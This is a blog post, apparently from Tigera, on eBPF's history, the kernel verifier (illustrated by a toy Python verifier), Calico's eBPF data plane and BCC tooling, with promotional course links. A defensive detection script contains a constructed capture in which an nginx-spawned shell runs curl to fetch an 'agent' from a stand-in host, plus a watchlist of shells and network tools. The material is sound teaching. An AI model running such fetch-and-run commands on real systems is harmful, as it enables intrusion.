With the recent advancements in service delivery through containers, Linux has gained a lot of popularity in cloud computing by enabling digital businesses to expand easily regardless of their size or budget. These advancements have also brought a new wave of attacks, which is challenging to address with the same tools we have been using for non-cloud-native environments. eBPF offers a new way to interact with the Linux kernel, allowing us to re-examine possibilities that were once difficult to achieve.
In this post, I will go through a brief history of the steps that eBPF had to take to become the Swiss army knife inside the Linux kernel and point out how it can be used to achieve security in a cloud-native environment. I will also share my understanding of what happens inside the kernel that prevents BPF programs from wreaking havoc on your operating system.
In the early days of computing, Unix was a popular solution for capturing network traffic, and using the CMU/Stanford packet filter (CSPF) to capture packets on a 64KB PDP-11 was gaining popularity by the second. Without a doubt, this was pioneering work and a leap forward for its time, but like most solutions, it also created problems.
Massive demand for information and the old architecture of CSPF started to cause poor performance on newer machines, like the 16 MB Sun SPARCstation, leaving the world to search for a better option.
In 1992, Steven McCanne and Van Jacobson wrote a paper with eye-catching claims: by implementing BPF, capturing packets could be 10 to 100 times faster than with CSPF. This was possible by applying kernel agents with the ability to discard unwanted packets as early as possible, before they were copied to user space.
In 2014, Alexei Starovoitov extended BPF capabilities and started the eBPF movement. Today, eBPF extensions allow a developer to reach corners of the kernel that were previously impossible. eBPF offers capabilities beyond just capturing or filtering packets; it is better to refer to it as a virtual machine inside the kernel that can verify instructions and run them without changing the kernel source code or recompilation.
BPF security and use cases
It would be challenging to explain BPF without mentioning the Linux kernel. The kernel is the interface between applications and the underlying hardware, providing a solid and robust foundation for interacting with it. Usually, applications like web browsers run in user space, where they issue system calls via a framework or a high-level programming language to communicate with the kernel.
BPF can be used in conjunction with internal kernel events to probe, peek at, or manipulate the operating system's behavior. Although experimenting with the kernel might sound like a recipe for disaster, the BPF verifier ensures the safety of every BPF program before it is allowed to run inside the kernel.
The first verification step begins by mapping all the areas that a program needs to access and then determines where the BPF program ends, because BPF programs are not permitted to run indefinitely: an unbounded program could slow down the whole system.
Next, a dry-run execution takes place to validate the overall life cycle of the BPF program. It saves a detailed history of each instruction the program executes and returns that history to the verifier.
These two procedures ensure that your system never gets blocked by an endless loop and that a BPF program cannot use unpacking or any other method to compromise the system. Keep in mind that explaining the verifier in detail is out of the scope of this blog post; these two steps are just a simple summary of what it does.
If a program is deemed safe by the verifier, it is passed to the kernel for execution.
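To make the two verifier passes above concrete, here is a toy model written for this post; it is not the kernel's verifier and not code from the Calico project. It uses a constructed seven-opcode instruction set (not real eBPF bytecode) and an assumed 64-byte stack with registers r0 to r10. Pass 1 bounds the program and proves that every path ends in an exit with no backward jumps; pass 2 dry-runs every path, tracking which registers and stack slots hold defined values and keeping a per-instruction history, and rejects reads of anything uninitialised.

```python
"""Toy model of the two verifier passes described in the text.

Constructed instruction set for this example (not real eBPF bytecode):
  ("mov", dst, imm)        r[dst] = imm
  ("add", dst, src)        r[dst] = r[dst] + r[src]
  ("st",  off, src)        stack[off] = r[src]      (8-byte slots, off in -64..-8)
  ("ld",  dst, off)        r[dst] = stack[off]
  ("jeq", src, imm, tgt)   if r[src] == imm: goto tgt (absolute index, forward only)
  ("jmp", tgt)             goto tgt
  ("exit",)                return r[0]
"""

MAX_INSNS = 32                     # instruction budget; the kernel's is far larger
STACK_SLOTS = range(-64, 0, 8)     # assumed 64-byte BPF stack, addressed via r10
NUM_REGS = 11                      # r0..r10, like real BPF


class VerifierError(Exception):
    """Raised when the program is rejected; the message is the reason."""


def check_structure(prog):
    """Pass 1: bound the program and prove every path reaches 'exit'."""
    if not prog:
        raise VerifierError("empty program")
    if len(prog) > MAX_INSNS:
        raise VerifierError(f"program has {len(prog)} insns, limit is {MAX_INSNS}")
    for idx, insn in enumerate(prog):
        if insn[0] in ("jeq", "jmp"):
            tgt = insn[-1]
            if not 0 <= tgt < len(prog):
                raise VerifierError(f"insn {idx}: jump target {tgt} out of bounds")
            if tgt <= idx:
                raise VerifierError(f"insn {idx}: backward jump (loop) not allowed")
    # Walk the control-flow graph; falling past the last insn means no 'exit'.
    reachable, todo = set(), [0]
    while todo:
        pc = todo.pop()
        if pc in reachable:
            continue
        reachable.add(pc)
        op = prog[pc][0]
        if op == "exit":
            continue
        nxt = [prog[pc][-1]] if op == "jmp" else [pc + 1]
        if op == "jeq":
            nxt.append(prog[pc][-1])
        for n in nxt:
            if n >= len(prog):
                raise VerifierError(f"insn {pc}: falls off the end without 'exit'")
            todo.append(n)
    unreachable = set(range(len(prog))) - reachable
    if unreachable:
        raise VerifierError(f"unreachable insns: {sorted(unreachable)}")
    return reachable


def simulate_paths(prog):
    """Pass 2: dry-run every path, tracking defined registers and stack slots.

    Returns the history {pc: [frozenset of initialised regs per visit, ...]}.
    """
    history = {}
    # Entry state: r1 holds the context pointer, r10 the frame pointer.
    worklist = [(0, frozenset({1, 10}), frozenset())]
    steps = 0
    while worklist:
        pc, regs, slots = worklist.pop()
        steps += 1
        if steps > MAX_INSNS * 4:      # complexity limit for the simulator itself
            raise VerifierError("path explosion: too many states")
        history.setdefault(pc, []).append(regs)
        insn = prog[pc]
        op = insn[0]
        if op == "exit":
            if 0 not in regs:
                raise VerifierError(f"insn {pc}: exit with r0 uninitialised")
            continue
        if op == "mov":
            regs = regs | {_reg(insn[1], pc)}
        elif op == "add":
            dst, src = _reg(insn[1], pc), _reg(insn[2], pc)
            if dst not in regs or src not in regs:
                raise VerifierError(f"insn {pc}: add reads uninitialised register")
        elif op == "st":
            off, src = _slot(insn[1], pc), _reg(insn[2], pc)
            if src not in regs:
                raise VerifierError(f"insn {pc}: store of uninitialised r{src}")
            slots = slots | {off}
        elif op == "ld":
            dst, off = _reg(insn[1], pc), _slot(insn[2], pc)
            if off not in slots:
                raise VerifierError(f"insn {pc}: load from uninitialised stack slot {off}")
            regs = regs | {dst}
        elif op == "jeq":
            src = _reg(insn[1], pc)
            if src not in regs:
                raise VerifierError(f"insn {pc}: jeq on uninitialised r{src}")
            worklist.append((insn[3], regs, slots))     # branch taken
        elif op == "jmp":
            worklist.append((insn[1], regs, slots))
            continue
        else:
            raise VerifierError(f"insn {pc}: unknown opcode {op!r}")
        worklist.append((pc + 1, regs, slots))          # fall-through
    return history


def _reg(r, pc):
    if not 0 <= r < NUM_REGS:
        raise VerifierError(f"insn {pc}: bad register r{r}")
    return r


def _slot(off, pc):
    if off not in STACK_SLOTS:
        raise VerifierError(f"insn {pc}: stack offset {off} outside the frame")
    return off


def verify(prog):
    """Run both passes; return (True, history) or (False, reason)."""
    try:
        check_structure(prog)
        return True, simulate_paths(prog)
    except VerifierError as e:
        return False, str(e)


# Constructed sample programs.
GOOD = [("mov", 0, 0), ("st", -8, 0), ("ld", 2, -8), ("add", 0, 2), ("exit",)]
LOOP = [("mov", 0, 1), ("jmp", 0), ("exit",)]                   # jumps backwards
NO_EXIT = [("mov", 0, 1), ("jeq", 0, 1, 2), ("mov", 3, 7)]       # can fall off the end
UNINIT = [("ld", 0, -8), ("exit",)]                              # reads stack never written

if __name__ == "__main__":
    for name, prog in [("GOOD", GOOD), ("LOOP", LOOP), ("NO_EXIT", NO_EXIT), ("UNINIT", UNINIT)]:
        ok, detail = verify(prog)
        print(f"{name:8s} {'ACCEPT' if ok else 'REJECT: ' + detail}")
```

Running the module prints one verdict per sample program: only GOOD is accepted, while the loop, the program that can fall off its end, and the program that reads a stack slot it never wrote are rejected with the reason. The real verifier tracks far more (pointer types, value ranges, helper call contracts, bounded loops on recent kernels), but the shape is the same: a structural pass over the control-flow graph, then a symbolic walk of every path that records state at each instruction.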
BPF program types
A BPF program declares a program type, which determines where in the kernel it can be attached. Each program type provides the functions and helpers needed to interact with that part of the kernel.
For example, the Calico eBPF data plane uses a range of these program types to interact with the socket operations at the lowest level, allowing Calico to use the efficiency of the kernel and manipulate traffic as early as possible.
Calico Cloud is another solution from Tigera that uses BPF to provide enterprise-level features such as image assurance, runtime threat defense, application-level security, and observability.
Calico eBPF data plane
Tigera uses eBPF technology to create the Calico eBPF data plane. This blazing-fast networking data plane can push a massive amount of traffic at the lowest resource cost compared to the standard Linux kernel data plane.
Another considerable benefit of the Calico eBPF data plane is source IP preservation.
By attaching BPF programs at the earliest point, the Calico eBPF data plane can replace the kube-proxy pods and route the traffic without changing its source IP.
IO Visor Project
While understanding programming can be beneficial, it is not a mandatory skill, and networking is not the only thing that is achievable with eBPF programs.
IO Visor is an open source project from the Linux Foundation that offers many ready-to-use BPF programs to interact with various parts of the system.
For example, BCC, an IO Visor subproject, offers BPF programs that can observe the system from the device driver level up to the system calls initiated by the application layer. BCC provides Python and Lua front-ends that can help any system administrator curate the output of these examples to match their needs.
kubectl-trace is another IO Visor subproject that offers a way to schedule bpftrace programs in your Kubernetes cluster. Since containers share their kernel with the underlying host, BPF can give you accurate insight into all the system calls and resource consumption that your containerized applications are demanding.
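As an added example of what "curating the output" of a BCC tool looks like on the defensive side (this is not code from BCC, IO Visor or Tigera): the script below takes a capture in the column layout of BCC's execsnoop (PCOMM PID PPID RET ARGS), rebuilds the parent-child chain from the PPID column, and reports successful execs of binaries a web server or worker should not be launching. The capture is constructed for this example and is not output from any real host; the watchlist is an assumption to be tuned per workload.

```python
"""Curate BCC execsnoop-style output into a short report of risky execs.

The sample capture below is constructed for this example in execsnoop's
column layout (PCOMM PID PPID RET ARGS); it is not real output from any host.
"""
from collections import namedtuple
import os

Exec = namedtuple("Exec", "comm pid ppid ret args")

SAMPLE_CAPTURE = """\
PCOMM            PID    PPID   RET ARGS
nginx            2201   2190     0 /usr/sbin/nginx -g daemon off;
python3          2310   2290     0 /usr/bin/python3 /app/worker.py
sh               4321   2201     0 /bin/sh -c id
id               4322   4321     0 /usr/bin/id
curl             4350   4321     0 /usr/bin/curl -s http://update.example.invalid/agent
ls               4400   2310     0 /bin/ls /tmp
sh               4500   2310    -2 /bin/sh -c /nonexistent
"""

# Assumed watchlist: binaries a web server or worker has no business launching.
WATCHLIST = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat"}


def parse_execsnoop(text):
    """Turn execsnoop lines into Exec records, skipping the header and junk."""
    records = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 4 or parts[0] == "PCOMM":
            continue
        comm, pid, ppid, ret = parts[:4]
        args = parts[4] if len(parts) == 5 else ""
        try:
            records.append(Exec(comm, int(pid), int(ppid), int(ret), args))
        except ValueError:
            continue            # malformed line, e.g. wrapped terminal output
    return records


def ancestry(pid, by_pid):
    """Follow PPID links back through the capture until the chain leaves it."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].comm)
        pid = by_pid[pid].ppid
    return chain


def find_suspicious(records, watchlist=WATCHLIST):
    """Return (pid, ancestry chain, args) for successful execs of watch-listed binaries."""
    by_pid = {r.pid: r for r in records}
    hits = []
    for r in records:
        if r.ret != 0:
            continue                          # failed exec: nothing actually ran
        binary = os.path.basename(r.args.split()[0]) if r.args else r.comm
        if binary in watchlist or r.comm in watchlist:
            hits.append((r.pid, " <- ".join(ancestry(r.pid, by_pid)), r.args))
    return hits


if __name__ == "__main__":
    for pid, chain, args in find_suspicious(parse_execsnoop(SAMPLE_CAPTURE)):
        print(f"pid {pid}: {chain}\n    {args}")
```

On the constructed capture this reports two events, the shell spawned by nginx and the curl spawned by that shell, and ignores the failed exec (RET -2) because nothing ran. Because the kernel is shared, the same capture taken on a node covers every container on it; in practice you would feed the script from a live execsnoop or a kubectl-trace job and join the PIDs against container metadata.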
The eBPF technology use cases are growing by the second, and a cloud-native environment is one of the most prominent candidates to reap the benefits.
I've shared what was interesting to me about eBPF, but in this vast landscape there is much more to be discovered. If you'd like to know more about the Calico eBPF data plane, eBPF technology, and its use cases, I highly recommend that you check out our free eBPF course at academy.tigera.io.
Ready to become a Calico certified operator? Try our free, self-paced certification courses today.